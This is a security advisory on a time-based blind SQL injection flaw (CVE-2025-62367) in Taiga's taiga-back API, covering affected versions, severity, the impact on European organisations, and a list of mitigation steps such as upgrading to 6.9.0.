CVE-2025-62367 is a vulnerability classified under CWE-89 (Improper Neutralization of Special Elements used in an SQL Command), specifically a time-based blind SQL injection in the taiga-back component of the Taiga open source project management platform. Versions 6.8.3 and earlier are affected. The vulnerability arises because the Taiga API does not properly sanitize or neutralize user-supplied input before incorporating it into SQL queries. This flaw allows an attacker to inject malicious SQL code that can alter the logic of database queries. The time-based blind SQL injection technique enables attackers to infer sensitive information by measuring the time the server takes to respond to crafted requests, even though no direct error messages or data are returned. Exploitation requires network access to the API, low privileges (likely a user account), and user interaction, which increases the attack complexity. The vulnerability impacts confidentiality by potentially exposing sensitive data stored in the database but does not affect data integrity or system availability. The issue was publicly disclosed on October 28, 2025, and fixed in Taiga version 6.9.0. No known exploits have been reported in the wild so far. The CVSS v3.1 base score is 4.8, reflecting medium severity due to the attack vector (network), required privileges (low), user interaction (required), and high impact on confidentiality.

For European organizations using Taiga versions prior to 6.9.0, this vulnerability poses a risk of sensitive data disclosure through exploitation of the SQL injection flaw. This could include project management data, user information, or other confidential business data stored in the backend database. Such data leakage can lead to reputational damage, regulatory non-compliance (e.g., GDPR violations), and potential competitive disadvantage. Since the vulnerability does not affect integrity or availability, direct disruption of services or data manipulation is less likely. However, the exposure of sensitive information can facilitate further attacks such as phishing or social engineering. Organizations relying on Taiga for critical project management or collaboration should prioritize patching to prevent unauthorized data access. The requirement for user interaction and low privileges somewhat limits the attack surface but does not eliminate risk, especially in environments with many users or exposed APIs.

1. Upgrade all instances of taiga-back to version 6.9.0 or later immediately to apply the official fix. 2. Implement strict input validation and sanitization on all API endpoints to prevent injection of malicious SQL code. 3. Employ Web Application Firewalls (WAFs) with rules designed to detect and block SQL injection attempts, particularly time-based blind injection patterns. 4. Monitor API access logs for unusual patterns such as repeated requests with timing anomalies indicative of blind SQL injection probing. 5. Restrict API access to trusted networks and authenticated users only, minimizing exposure to external attackers. 6. Conduct regular security assessments and penetration testing focusing on injection vulnerabilities in the project management platform. 7. Educate users about the risks of interacting with suspicious links or payloads that could trigger the vulnerability. 8. Review database permissions to ensure the Taiga backend operates with the least privilege necessary, limiting potential data exposure.